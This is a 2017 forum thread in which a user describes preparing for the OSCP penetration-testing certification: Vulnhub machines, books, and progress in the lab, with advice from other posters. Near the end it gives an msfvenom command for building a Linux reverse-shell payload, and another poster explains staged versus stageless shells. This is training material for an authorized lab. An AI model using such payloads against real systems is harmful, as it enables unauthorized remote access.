Just Another OSCP Journey

Hausec · May 2017

I've been in information security for a few years now and pentesting is about 30% of my job. I'd like to do it full time one day so researching how to get there showed the OSCP. Since I read about it, I knew I wanted it. I created a website, www.hausec.com, to document what I've done in preperation for PWK -- from Vulnhub write-ups to cheatsheets. I have a section dedicated to my OSCP progress and I'll basically be copy+pasting from here to there and vice versa.

Here's what I've done to prepare for PWK (About a year ago now):

At home I have a giant whiteboard attached to my wall. On it, I’ve drawn a tree diagram with my goal of OSCP at the top. I have four components I want to “check off” before I registered for the OSCP. They are:

Vulnhub VMs
Homelab(Psuedo Windows environment)
Books
Videos
Homelab was the first thing I crossed off. I simply installed an ESXI server on an old box I had laying around and build a Windows environment with server 2003, 2008 R2, 2012 R2, XP, Win 7, Vista, and Win8. The point of this was to purposely make misconfigs in the domain (e.g. DNS Zone Transfers) that will simulate what a real environment will be like.

Vulnhub VMs were the things that took me the longest. I’ve done a lot of research and read a lot of blogs on people who have taken the OSCP, and of those that listed Vulnhub VMs, I’ve gone and downloaded and added to my list. It’s as followed:

64Base
Droopy
FristiLeaks
IMF
Kevgir
Kioptrix 1-4
LordofTheRoot
Metasploitable 2
Mr.Robot
NullByte
Pwnlab_init
PwnOS 1.0
SickOS 1.2
SickOS 1.1
Stapler
trll
trll2
Vulnix

For some of these I've done a write-up as I’ve noticed that write-ups greatly help me remember what I did. To assist me with these, I compiled a **** sheet as well that can be found here.

Next are books. I have five books that I have read since my preperation:

Metasploit, the Penetration Tester’s Guide
Practical Malware Analysis (Definitely not needed for OSCP but this helps with my job)
Hacking Exposed 7
Violent Python (Also not too necessary, but does help)
RTFM (More of a reference guide, but still helpful)

Finally there are 4 video topics I've watched from Pentester Academy: Learn Pentesting Online, it’s a subscription to watch them and I got it when it was on sale.

Python
Powershell
Network
Webapp
Shellcoding

With the exception of a few videos and some chapters in the books, I've accomplished all of these so I registered for PWK starting on June 24th for 90 days.

I work full time, and I'm still in school part time, so I figured I would need the most time as possible. Once my lab time is up I’ll attempt the exam. I know if I were to take the exam now I would probably not even root one box, but I feel as though my preparation over the last year has prepared me for the PWK. The plan is when the lab opens up, to download all the training material. I won’t even begin scanning or pentesting; I’m just going to go through the course material and do the labs, taking notes when appropriate. I won’t be posting anything specific here, but I’ll be keeping personal notes.

Once I’ve finished the labs and course materials, I will then start pentesting the machines in the environment and document those as well. I’m prepared to have my confidence crushed, as others have before, and truth be told I doubt I’ll pass the OSCP on the first try as it usually takes a few, but I'll definitely try my hardest.

saraguru · May 2017

This is a great preparation for OSCP Hausec!!! Hope you have a great time in lab and enjoy it as much as I did. Good luck and have Fun

JoJoCal19 · June 2017

Awesome writeup! Your prep is exactly what I had in mind for when I go for the OSCP. I'll definitely be following your thread/blog.

LonerVamp · June 2017

Good stuff! I think doing the vulnhubs is a little overkill, but it will mean you get to hit the ground running and already have an idea for your own personal enumeration checklist!

Good luck!

Blucodex · June 2017

I'm a month in. I didn't touch the videos until last weekend and they really help. I assumed they were the same as the PDF and they aren't. Use them both!

Dr. Fluxx · June 2017

Everything sounds great training wise...looks like my set up, but you work full time, school full time AND youre going to try this in 30 days?
That's going to be hard as hell.

Hausec · June 2017

Dr. Fluxx wrote: »

Everything sounds great training wise...looks like my set up, but you work full time, school full time AND youre going to try this in 30 days?
That's going to be hard as hell.

Nah, school part-time, work-full time and I bought the 90 day package. It's still a lot though, so here's to no life for the next 3 months.

LonerVamp · June 2017

Just wanted to circle back around now that I had a chance to check out your site. I love it! That ********** is going to take you places!

Hausec · June 2017

LonerVamp wrote: »

Just wanted to circle back around now that I had a chance to check out your site. I love it! That ********** is going to take you places!

Thanks! I personally have to take notes or else I forget things, so I figured why not just make them available to everyone?

LonerVamp · June 2017

I guess this site censors ch34tsh33t... but not with a space: **** sheet

Chard26 · June 2017

Hi Hausec,

Sounds like you have a solid plan, i have been in the PWK labs for 2 weeks now and loved every minute of it. That being said i havent touched the lab machines yet, well i did have a go at Alice but used metsaploit. I am currently putting 2-3 hours a night (mon-fri) and 10-14 hours per day over the weekend.

Give me a shout if you wanna bounce ideas around.

Thanks
Chard

rex0r · June 2017

Hausec wrote: »

Nah, school part-time, work-full time and I bought the 90 day package. It's still a lot though, so here's to no life for the next 3 months.

We've all been there man.. PM me if you want an invite to the TE OSCP Discord. Join up and come chat if you need any help.

Hausec · June 2017

Chard26 wrote: »

Hi Hausec,

Sounds like you have a solid plan, i have been in the PWK labs for 2 weeks now and loved every minute of it. That being said i havent touched the lab machines yet, well i did have a go at Alice but used metsaploit. I am currently putting 2-3 hours a night (mon-fri) and 10-14 hours per day over the weekend.

Give me a shout if you wanna bounce ideas around.

Thanks
Chard

Absolutely, thanks!

Hausec · June 2017

rex0r wrote: »

We've all been there man.. PM me if you want an invite to the TE OSCP Discord. Join up and come chat if you need any help.

Yes, definitely.

Hausec · June 2017

I've started the PWK course. Right on time, OffSec emailed me everything. I have my videos and the PDF which I'm watching now. As others have stated, the videos is the primary way of learning, with PDFs being the thing you do after. So watch a video on a module > then read about it. I do have a question for those who have done this --- the documentation is unclear on what is good enough for "documenting" the exercises. Do just screenshots suffice?

deyavi · June 2017

That's probably a question better asked in Offsec's forum or directly on their support chat...
I didn't document the exercises myself.

teawreckz · June 2017

I'll be eager to see any updates, Hausec. This one is definitely on my list of certifications...

LonerVamp · June 2017

Hausec wrote: »

...I do have a question for those who have done this --- the documentation is unclear on what is good enough for "documenting" the exercises. Do just screenshots suffice?

On the Offsec support web site, you should be able to find an example or two for lab reports, plus you can check the exam rules/requirements and they should also contain a report example. Both should, in general give some guidelines as well. Combine the report examples with the guidelines and your own common sense about what you'd like to see/include in the report, and you should be a winner.

But feel free to check with support directly.

Hausec · June 2017

LonerVamp wrote: »

On the Offsec support web site, you should be able to find an example or two for lab reports, plus you can check the exam rules/requirements and they should also contain a report example. Both should, in general give some guidelines as well. Combine the report examples with the guidelines and your own common sense about what you'd like to see/include in the report, and you should be a winner. But feel free to check with support directly.

I'll check that out then, thanks.

Yesterday I finished the Buffer overflow & fixing exploit modules and they were the toughest yet, but that was expected from what I read so far. They weren't overly difficult but I do have experience doing them before. I heavily recommend doing the t-r-0-l-l-2 VM off Vulnhub and read my walkthrough on it to get a decent understanding of what is going on during a buffer overflow and then you'll have an easier time with the modules. I think I had a more difficult time with the fixing exploits modules than I did buffer overflow, but I was just over-complicating things and had to keep it simple. The examples in the module do not need any more than 3 changes each. Also, remember to re-generate the shellcode after reconnecting to the VPN, as it will change things.

I will say the buffer overflow example for Linux was vastly different from what I've seen in the past and it was interesting how they did it. I probably will have to revisit that before my exam.

Another note: While they explain buffer overflows VERY well, it helps to make a quick ****-sheet for them. Mine has 10 steps on what to do, so I'm not scrolling through 20 pages.

adrenaline19 · June 2017

Are you doing all of the extra exercises at the end of each chapter too?

Hausec · June 2017

adrenaline19 wrote: »

Are you doing all of the extra exercises at the end of each chapter too?

Yes, I'm literally going through the PDF and doing everything it asks.

Hausec · July 2017

I finished the PDFs 3 days ago and started on the labs. I knocked out Alice quite easily then started on Phoenix and found my entry point but some student kept reverting the VM so I moved on to BOB. BOB was a challenege for sure. I have never escalated privileges in Windows before so it was such a good machine for me to take on. I used the forums and in the end had to utilize a hint from an admin but I got it. For those about to start: Give this a read: FuzzySecurity | Windows Privilege Escalation Fundamentals

I'll poke around some more machines today but I was working on BOB for about 4 hours yesterday and another 4 today, so I'm going to go take a breather for a bit.

aakashc1 · July 2017

Hello, Hausec
I am also doing my preparation for OSCP. I will take this course next year may be in aug 2018.
This is my plan before OSCP ->

1. First learning Python basics and then practice using this site :-> Practice Python

2. After basic i will learn some basics of python scripts for python and practice on them. These two things i will take about 3 months

3. After that python I will take time in learning Bash Shell atleast basics and concepts about linux and their commands.

4. Then I will start vulnhub machines solving. This will take atleast 2 months to me and may be more then that.

5. To grasp knowledge of metasploit i am thinking to read online site of metasploit unleashed

6. Book i will read to Pentesting by Georgia

7. There is website -> hackthebox which have 22 machines [windows + linux] may be like OSCP. So i will take time to solve this too before OSCP

8. And give two months to PWK ebook and video 2014 version so that my time save before taking OSCP Course

Also i am not going to install windows series as victim machine as i will read blogs of raj chandel and note them in my both notebook and keepnote

But Hausec, i am getting a serious problem this time.
I am using both Vmware and Virtualbox.
Parrot OS in vmware
De-ICE 100 target machine in vulnhub
window 7 target machine [using just for pinging purpose so that i get ip address]

When i ping vmware machine[parrot] then it pinging fine
But when i try to ping virtualbox machine[window 7] then i am not getting pining fine

And hence i am not getting ip of victim machine.

Vmware setting -> vmnet0 -> automatic
Virtualbox setting -> Host Only Adapter

I tried every setting but failed.

Can you help me in this matter please
Thanks

Hausec · July 2017

Not sure man, I never crossed streams like that, I always used VMWare.

Also update:
Bethany down. This thing took me 3 days and was 2x as hard as Bob in my opinion. I recommend reading over the AV evasion section for this box and brushing up on Powershell.

Hausec · July 2017

Took some major confidence blows as I couldn't get a shell on Phoenix. I know the vulnerability and I can exploit it, but cannot get a shell talking back to me. I moved on to Barry which is essentially a Vulnhub VM that's very popular and easily got a less-privileged shell but having some major compiling issues that won't allow me to escalate to root. After banging my head on that for 4 hours I moved to MIKE which felt like the first machine I knew what I was doing on and got root on it after a few hours. I'm kinda disappointed in my slowness but I just get burned out after a while and miss things that are obvious.

So far:
ALICE
BOB
BETHANY
MIKE
BARRY (Low privilege)

What's everyone's opinions on using Nessus in the labs? I know in the videos they said to give it a shot and it's obviously not allowed to be used on the exam, but I think from a learning perspective it can be good to show which machines have which vulnerabilities and then work backwards from discovering it on your own.

adrenaline19 · July 2017

Hey, if you take another look at Phoenix, try different shell packages.

Sometimes one might not work, but others might work perfectly. Your exploit could be right, but your payload might be the problem.

Hausec · July 2017

adrenaline19 wrote: »

Hey, if you take another look at Phoenix, try different shell packages.

Sometimes one might not work, but others might work perfectly. Your exploit could be right, but your payload might be the problem.

Got it. Thanks for the tip!
&Rooted.

So far:
ALICE
BOB
BETHANY
MIKE
BARRY (Low privilege)
PHOENIX

LonerVamp · July 2017

RE: Nessus (OpenVAS)

If you have the time, I think it's definitely something you can look into. Personally, even with a good pace and clearing the labs before my 90 days were up, I never really found the time or energy to follow through with vuln scans. It becomes a little annoying when you have to have a root account for each system, which may mean re-rooting to add an account, and run the (small) risk of a revert midway through. It was on my "want to do, but does not apply directly to the exam" list of things to do.

Still, if you want to have a chance to find multiple issues, that may be a way to go.

Also, I suggest it if vuln scans are a new thing to you. They are still kind of the bread and butter service for many firms, and can often fuel a subsequent pen test.

Hausec · July 2017

LonerVamp wrote: »

RE: Nessus (OpenVAS)

If you have the time, I think it's definitely something you can look into. Personally, even with a good pace and clearing the labs before my 90 days were up, I never really found the time or energy to follow through with vuln scans. It becomes a little annoying when you have to have a root account for each system, which may mean re-rooting to add an account, and run the (small) risk of a revert midway through. It was on my "want to do, but does not apply directly to the exam" list of things to do.

Still, if you want to have a chance to find multiple issues, that may be a way to go.

Also, I suggest it if vuln scans are a new thing to you. They are still kind of the bread and butter service for many firms, and can often fuel a subsequent pen test.

I use SecurityCenter daily at my job, so I'm very familiar with it. I ran the scan and it picked up quiet a bit and I'll dive through it tonight.

A quick note as well to those starting PWK:
I've learned that reverse shells (non-meterpreter) generated via msfvenom do not spawn a shell like they should when listening with netcat. I get the connection, but no shell. To get around this, I added /exploit/multi/handler to the command and that makes it so I can listen using metasploit's multihandler for the shell, so my command looks like this:

msfvenom exploit/multi/handler -p linux/x86/shell/reverse_tcp LHOST=IP LPORT=PORT -f elf > exploit.elf

This then gives me the command shell like I should have. This is also allowed on the OSCP exam as well:

"You may use the following against all of the target machines:
- multi handler (aka exploit/multi/handler)
- msfvenom
- pattern_create.rb
- pattern_offset.rb"

Hope this helps anyone.

verdigris · July 2017

Hausec wrote: »

A quick note as well to those starting PWK:
I've learned that reverse shells (non-meterpreter) generated via msfvenom do not spawn a shell like they should when listening with netcat. I get the connection, but no shell.

This is a common point of confusion that tripped me up as well. You need to use /shell_reverse_tcp rather than /shells/reverse_tcp when generating your shellcode with msfvenom if you want to receive the shell without the metasploit handler. The former is a single stage payload that can be caught by ncat while the second is a staged payload that can only be handled by the metasploit handler.

Blucodex · July 2017

Good info gentlemen. Thank you!

Just Another OSCP Journey

Comments